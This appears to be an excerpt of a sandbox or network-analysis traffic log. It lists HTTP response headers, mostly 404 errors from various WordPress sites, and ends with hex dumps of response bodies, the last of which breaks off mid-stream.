Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html;charset=utf-8Content-Length: 964Vary: Accept-EncodingServer: DPS/2.0.0+sha-c81b86dX-Version: c81b86dX-SiteId: us-east-1Set-Cookie: dps_site_id=us-east-1; path=/; secureDate: Tue, 20 Feb 2024 23:26:13 GMTConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Feb 2024 23:26:13 GMTServer: ApachePragma: no-cacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0X-Frame-Options: SAMEORIGINLink: <https://eskimo.ch/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 20 Feb 2024 23:26:14 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://braekling.de/wp-json/>; rel="https://api.w.org/"Server-Timing: wp-before-template;dur=282.06, wp-before-template-db-queries;dur=8.77
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Feb 2024 23:26:13 GMTServer: Apache/2.4.58 (Unix)X-Powered-By: PHP/8.1.27Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://ksv-schwimmen.de/wp-json/>; rel="https://api.w.org/"X-TEC-API-VERSION: v1X-TEC-API-ROOT: https://ksv-schwimmen.de/wp-json/tribe/events/v1/X-TEC-API-ORIGIN: https://ksv-schwimmen.deVary: User-AgentContent-Type: text/html; charset=UTF-8Connection: closeTransfer-Encoding: chunked
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 20 Feb 2024 23:26:14 GMTContent-Type: text/htmlContent-Length: 146Connection: closeVary: Accept-EncodingVary: Accept-Encoding
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Feb 2024 23:26:14 GMTServer: ApacheSet-Cookie: PHPSESSID=sfq50kb1qfvnss6o2cj86hptn5kgkaui; path=/Pragma: no-cacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0X-Frame-Options: SAMEORIGINLink: <https://eskimo.ch/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html;charset=utf-8Content-Length: 964Vary: Accept-EncodingServer: DPS/2.0.0+sha-c81b86dX-Version: c81b86dX-SiteId: us-east-1Set-Cookie: dps_site_id=us-east-1; path=/; secureDate: Tue, 20 Feb 2024 23:26:15 GMTConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Feb 2024 23:26:15 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Feb 2024 23:26:15 GMTServer: ApacheStrict-Transport-Security: max-age=31536000; includeSubDomainsX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-XSS-Protection: 0X-Permitted-Cross-Domain-Policies: noneReferrer-Policy: same-originCache-Control: no-cache, privateConnection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Feb 2024 23:26:15 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 287Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html;charset=utf-8Content-Length: 964Vary: Accept-EncodingServer: DPS/2.0.0+sha-c81b86dX-Version: c81b86dX-SiteId: us-east-1Set-Cookie: dps_site_id=us-east-1; path=/; secureDate: Tue, 20 Feb 2024 23:26:16 GMTConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 20 Feb 2024 23:26:16 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Powered-By: PHP/8.1.27Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://www.cabinet-orsika.fr/wp-json/>; rel="https://api.w.org/"
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 20 Feb 2024 23:26:16 GMTContent-Type: text/htmlContent-Length: 146Connection: closeVary: Accept-EncodingVary: Accept-Encoding
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: openresty/1.21.4.1Date: Tue, 20 Feb 2024 23:26:16 GMTContent-Type: text/htmlContent-Length: 159Connection: closeVary: Accept-Encoding
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://norwegischlernen.info/index.php/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkeddate: Tue, 20 Feb 2024 23:26:16 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 20 Feb 2024 23:26:16 GMTContent-Type: text/htmlContent-Length: 146Connection: closeVary: Accept-EncodingVary: Accept-Encoding
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html;charset=utf-8Content-Length: 964Vary: Accept-EncodingServer: DPS/2.0.0+sha-c81b86dX-Version: c81b86dX-SiteId: us-east-1Set-Cookie: dps_site_id=us-east-1; path=/; secureDate: Tue, 20 Feb 2024 23:26:16 GMTConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Feb 2024 23:26:16 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 287Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Feb 2024 23:26:17 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 20 Feb 2024 23:26:16 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Powered-By: PHP/8.2.15Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://cfca.eu/wp-json/>; rel="https://api.w.org/"
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 20 Feb 2024 23:26:16 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://braekling.de/wp-json/>; rel="https://api.w.org/"Server-Timing: wp-before-template;dur=299.37, wp-before-template-db-queries;dur=9.59
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Feb 2024 23:26:16 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
Source: global traffic	HTTP traffic detected: HTTP/1.1 503 Service UnavailableDate: Tue, 20 Feb 2024 23:26:15 GMTServer: Apache/2.4.58 (Unix)Content-Length: 299Content-Type: text/html; charset=iso-8859-1Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 20 Feb 2024 23:26:17 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Powered-By: PHP/8.1.27Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://www.cabinet-orsika.fr/wp-json/>; rel="https://api.w.org/"
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html;charset=utf-8Content-Length: 964Vary: Accept-EncodingServer: DPS/2.0.0+sha-c81b86dX-Version: c81b86dX-SiteId: us-east-1Set-Cookie: dps_site_id=us-east-1; path=/; secureDate: Tue, 20 Feb 2024 23:26:17 GMTConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Founddate: Tue, 20 Feb 2024 23:26:17 GMTexpires: Thu, 19 Nov 1981 08:52:00 GMTcache-control: no-store, no-cache, must-revalidatepragma: no-cacheset-cookie: PHPSESSID=odv897nn5abvlneqq0h2r1au2p; expires=Fri, 10-Jun-2078 22:52:34 GMT; Max-Age=1713655577; path=/; secure; HttpOnly; SameSite=Noneaccess-control-allow-origin: *access-control-allow-methods: GET,POST,OPTIONS,DELETE,PUTaccess-control-allow-headers: X-Requested-With, Content-Type, Origin, Cache-Control, Pragma, Authorization, Accept, Accept-Encoding, tokencontent-type: text/html; charset=iso-8859-1x-backend: server1x-type: customerx-varnish: 986386937age: 0transfer-encoding: chunkedx-server: varnish-1connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Feb 2024 23:26:16 GMTServer: Apache/2.4.58 (Unix)X-Powered-By: PHP/8.1.27Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://ksv-schwimmen.de/wp-json/>; rel="https://api.w.org/"X-TEC-API-VERSION: v1X-TEC-API-ROOT: https://ksv-schwimmen.de/wp-json/tribe/events/v1/X-TEC-API-ORIGIN: https://ksv-schwimmen.deVary: User-AgentContent-Type: text/html; charset=UTF-8Connection: closeTransfer-Encoding: chunked
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 20 Feb 2024 23:26:18 GMTContent-Type: text/htmlContent-Length: 146Connection: closeVary: Accept-EncodingVary: Accept-Encoding
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Feb 2024 23:26:17 GMTServer: ApacheSet-Cookie: PHPSESSID=p6q633npd2lnvk4v8rbvdilhhdqasur3; path=/Pragma: no-cacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0X-Frame-Options: SAMEORIGINLink: <https://eskimo.ch/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: openresty/1.21.4.1Date: Tue, 20 Feb 2024 23:26:18 GMTContent-Type: text/htmlContent-Length: 159Connection: closeVary: Accept-Encoding
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 20 Feb 2024 23:26:18 GMTContent-Type: text/htmlContent-Length: 146Connection: closeVary: Accept-EncodingVary: Accept-Encoding
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Feb 2024 23:26:18 GMTServer: ApacheStrict-Transport-Security: max-age=31536000; includeSubDomainsX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-XSS-Protection: 0X-Permitted-Cross-Domain-Policies: noneReferrer-Policy: same-originCache-Control: no-cache, privateConnection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://norwegischlernen.info/index.php/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkeddate: Tue, 20 Feb 2024 23:26:18 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html;charset=utf-8Content-Length: 964Vary: Accept-EncodingServer: DPS/2.0.0+sha-c81b86dX-Version: c81b86dX-SiteId: us-east-1Set-Cookie: dps_site_id=us-east-1; path=/; secureDate: Tue, 20 Feb 2024 23:26:19 GMTConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 20 Feb 2024 23:26:19 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://braekling.de/wp-json/>; rel="https://api.w.org/"Server-Timing: wp-before-template;dur=288.11, wp-before-template-db-queries;dur=9.57
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 20 Feb 2024 23:26:19 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Powered-By: PHP/8.2.15Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://cfca.eu/wp-json/>; rel="https://api.w.org/"
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 20 Feb 2024 23:26:19 GMTContent-Type: text/htmlContent-Length: 146Connection: closeVary: Accept-EncodingVary: Accept-Encoding
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html;charset=utf-8Content-Length: 964Vary: Accept-EncodingServer: DPS/2.0.0+sha-c81b86dX-Version: c81b86dX-SiteId: us-east-1Set-Cookie: dps_site_id=us-east-1; path=/; secureDate: Tue, 20 Feb 2024 23:26:19 GMTConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 20 Feb 2024 23:26:18 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Upgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Feb 2024 23:26:17 GMTServer: Apache/2.4.58 (Unix)X-Powered-By: PHP/8.2.15Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: private, must-revalidateLink: <https://www.creativ-moebelwerkstaetten.de/wp-json/>; rel="https://api.w.org/"Vary: User-AgentContent-Type: text/html; charset=UTF-8Connection: closeTransfer-Encoding: chunked
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Founddate: Tue, 20 Feb 2024 23:26:20 GMTexpires: Thu, 19 Nov 1981 08:52:00 GMTcache-control: no-store, no-cache, must-revalidatepragma: no-cacheset-cookie: PHPSESSID=jrshqblhefuuu1dkl53sk7h65m; expires=Fri, 10-Jun-2078 22:52:40 GMT; Max-Age=1713655580; path=/; secure; HttpOnly; SameSite=Noneaccess-control-allow-origin: *access-control-allow-methods: GET,POST,OPTIONS,DELETE,PUTaccess-control-allow-headers: X-Requested-With, Content-Type, Origin, Cache-Control, Pragma, Authorization, Accept, Accept-Encoding, tokencontent-type: text/html; charset=iso-8859-1x-backend: server1x-type: customerx-varnish: 949056561age: 0transfer-encoding: chunkedx-server: varnish-2connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Feb 2024 23:26:19 GMTServer: ApacheSet-Cookie: PHPSESSID=76sntb9saam2tag0gj80kn76ifnq5ttf; path=/Pragma: no-cacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0X-Frame-Options: SAMEORIGINLink: <https://eskimo.ch/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Feb 2024 23:26:19 GMTServer: Apache/2.4.58 (Unix)X-Powered-By: PHP/8.1.27Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://ksv-schwimmen.de/wp-json/>; rel="https://api.w.org/"X-TEC-API-VERSION: v1X-TEC-API-ROOT: https://ksv-schwimmen.de/wp-json/tribe/events/v1/X-TEC-API-ORIGIN: https://ksv-schwimmen.deVary: User-AgentContent-Type: text/html; charset=UTF-8Connection: closeTransfer-Encoding: chunked
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 20 Feb 2024 23:26:21 GMTContent-Type: text/htmlContent-Length: 146Connection: closeVary: Accept-EncodingVary: Accept-Encoding
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Feb 2024 23:26:21 GMTServer: ApacheStrict-Transport-Security: max-age=31536000; includeSubDomainsX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-XSS-Protection: 0X-Permitted-Cross-Domain-Policies: noneReferrer-Policy: same-originCache-Control: no-cache, privateConnection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 20 Feb 2024 23:26:21 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Powered-By: PHP/8.1.27Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://www.cabinet-orsika.fr/wp-json/>; rel="https://api.w.org/"
Source: global traffic	HTTP traffic detected: HTTP/1.1 503 Service UnavailableDate: Tue, 20 Feb 2024 23:26:20 GMTServer: Apache/2.4.58 (Unix)Content-Length: 299Content-Type: text/html; charset=iso-8859-1Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Feb 2024 23:26:22 GMTServer: ApacheSet-Cookie: PHPSESSID=arkoh9iv7kpplugag7srr6uaq7b3i94d; path=/Pragma: no-cacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0X-Frame-Options: SAMEORIGINLink: <https://eskimo.ch/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Feb 2024 23:26:22 GMTServer: Apache/2.4.58 (Unix)X-Powered-By: PHP/8.1.27Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://ksv-schwimmen.de/wp-json/>; rel="https://api.w.org/"X-TEC-API-VERSION: v1X-TEC-API-ROOT: https://ksv-schwimmen.de/wp-json/tribe/events/v1/X-TEC-API-ORIGIN: https://ksv-schwimmen.deVary: User-AgentContent-Type: text/html; charset=UTF-8Connection: closeTransfer-Encoding: chunked
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Founddate: Tue, 20 Feb 2024 23:26:23 GMTexpires: Thu, 19 Nov 1981 08:52:00 GMTcache-control: no-store, no-cache, must-revalidatepragma: no-cacheset-cookie: PHPSESSID=3i8mjl67b2cj4sd4akmpj22c12; expires=Fri, 10-Jun-2078 22:52:46 GMT; Max-Age=1713655583; path=/; secure; HttpOnly; SameSite=Noneaccess-control-allow-origin: *access-control-allow-methods: GET,POST,OPTIONS,DELETE,PUTaccess-control-allow-headers: X-Requested-With, Content-Type, Origin, Cache-Control, Pragma, Authorization, Accept, Accept-Encoding, tokencontent-type: text/html; charset=iso-8859-1x-backend: server2x-type: customerx-varnish: 985656629age: 0transfer-encoding: chunkedx-server: varnish-1connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Feb 2024 23:26:24 GMTServer: ApacheStrict-Transport-Security: max-age=31536000; includeSubDomainsX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-XSS-Protection: 0X-Permitted-Cross-Domain-Policies: noneReferrer-Policy: same-originCache-Control: no-cache, privateConnection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Feb 2024 23:26:24 GMTServer: ApacheSet-Cookie: PHPSESSID=3ktuv7vq6r7vknqksmdr62djrvb9sdim; path=/Pragma: no-cacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0X-Frame-Options: SAMEORIGINLink: <https://eskimo.ch/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Feb 2024 23:26:24 GMTServer: Apache/2.4.58 (Unix)X-Powered-By: PHP/8.1.27Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://ksv-schwimmen.de/wp-json/>; rel="https://api.w.org/"X-TEC-API-VERSION: v1X-TEC-API-ROOT: https://ksv-schwimmen.de/wp-json/tribe/events/v1/X-TEC-API-ORIGIN: https://ksv-schwimmen.deVary: User-AgentContent-Type: text/html; charset=UTF-8Connection: closeTransfer-Encoding: chunked
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 20 Feb 2024 23:26:25 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Powered-By: PHP/8.1.27Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://www.cabinet-orsika.fr/wp-json/>; rel="https://api.w.org/"
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Feb 2024 23:26:25 GMTServer: Apache/2.4.58 (Unix)X-Powered-By: PHP/8.2.15Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: private, must-revalidateLink: <https://www.creativ-moebelwerkstaetten.de/wp-json/>; rel="https://api.w.org/"Vary: User-AgentContent-Type: text/html; charset=UTF-8Connection: closeTransfer-Encoding: chunked
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 20 Feb 2024 23:22:23 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 38 0d 0a 04 00 00 00 1f 3d 5a e5 0d 0a 30 0d 0a 0d 0a Data Ascii: 8=Z0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 20 Feb 2024 23:22:23 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 65 6c 65 62 72 61 74 69 6f 6e 31 37 69 6f 2e 69 6f 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at selebration17io.io Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 20 Feb 2024 23:22:24 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 66 36 36 0d 0a 02 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 f5 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 1d 2a 4a 83 04 b5 5c ea a8 e5 a7 26 74 76 7b e5 f8 ce c9 c4 87 48 96 ec 6b 7a 52 67 40 86 7d 25 5a a1 be 53 b6 ae 19 52 06 21 63 2a fb 84 1f e8 8a 93 f6 69 1f d7 73 3e a8 36 24 cb 55 0f 95 55 9a 95 8f b0 4e 47 03 43 ef 58 8e 4d 7e e4 57 c6 66 cc af a7 94 93 16 5c 61 26 01 56 97 90 45 4c a3 06 93 3a 56 3f cb 00 73 fb 42 15 9b 06 56 53 61 45 cc fb 1d 09 52 2b e5 8d 83 7b 9e 45 f5 de 73 8c 5c d2 c4 4d 07 13 bf ce e4 92 24 08 4f c5 5d bf cb a1 61 b8 dd f5 69 e9 0d 17 7e 5f af 8a a5 54 c9 a0 c1 a9 dd 7a 08 90 4e 19 e0 2c 95 a9 1d 1a f5 96 be 25 51 61 9a f4 24 7c 88 38 c8 48 6b a1 c0 4a 98 03 fc 6c 9e aa 6b ac 87 3f bd 61 0d c0 4d bf 46 24 fd f8 12 6c 33 6c 39 7c 0a 8d 47 5b fc 0e d4 eb 7e 71 2f 1a ed 1a cc 9a 4a d8 19 6e d5 4f ab 7a 82 ae 9c 97 02 4c 75 56 ad f3 57 3b 2a b9 72 ee cc 23 b2 a5 17 31 59 a2 90 f7 8f e0 ec e7 6e 2b 4c 80 d0 12 f9 13 63 11 bb d6 af 31 3c 27 d4 69 b7 9f 33 c9 cc 46 d9 48 15 ac af eb d9 55 3d af ba 68 92 0e ff 9d 7f 7f 55 40 57 34 6f 39 82 e6 ac 04 28 84 42 40 77 9b c7 9b 84 e7 3d 66 f1 8a 64 b1 1d 30 12 51 8c 70 17 4b af 1f ba f6 f6 01 e8 e4 ba 6a b5 90 4e b1 54 55 a5 ce a3 1b 6f d3 cb 29 32 28 e7 5b 1e 54 ab 1e 26 7d 11 ee e3 ce 57 c3 62 6f e1 7e a0 3d 68 91 6c 7f 02 f1 2c 0e ba 03 5b 85 1b e4 a6 2d 04 9f 10 b9 d9 b0 99 07 99 8a cd e4 7f 74 39 50 6d 03 e2 dd ea ff 80 62 7a d7 e4 87 c2 e0 2b 19 ac bb 01 7a 16 28 d2 1e 5e 1f d0 a1 aa 7a 8f f6 6b e3 cd d0 d9 37 40 80 e3 dc e7 52 86 20 2b c4 3a 96 dd c8 e7 17 3f 1c fc 7e 4d b6 70 d4 03 5b b5 98 76 6e 0f ca 82 cf 25 2e 9f 96 ce ec 75 98 c3 e7 23 da af b8 30 4a 43 43 20 13 03 62 18 ea 04 f8 40 fa ae 88 c1 04 b8 33 25 7d da a9 c3 e8 c8 2f cb e2 09 e8 cb 23 1e ee 18 b8 77 b3 0e 93 81 19 13 88 b9 8c f5 18 97 52 b9 c1 ea 9e 13 e8 b8 4c 45 e1 f0 73 8d 43 d9 ed 07 b2 52 dc 1a 9e 8b 18 57 21 01 7d 42 03 81 96 7f d8 2e 27 9d df 3c 42 56 60 de 9e 73 0f b6 65 a2 25 1f 78 60 38 30 5f d6 a6 b8 78 fe b1 8e 98 6d 18 5e 32 d0 e9 f3 32 42 c2 39 16 12 47 0b e9 17 10 8d e3 51 20 b2 3d db 10 54 5a 17 1c 5c 5a 16 b3 19 5f 11 8f 69 f9 e4 39 2a 01 6e f1 fd 58 b3 dc 95 25 1c 90 53 72 5e 15 33 b5 01 82 e3 92 c2 01 6d 7e d3 85 bc 43 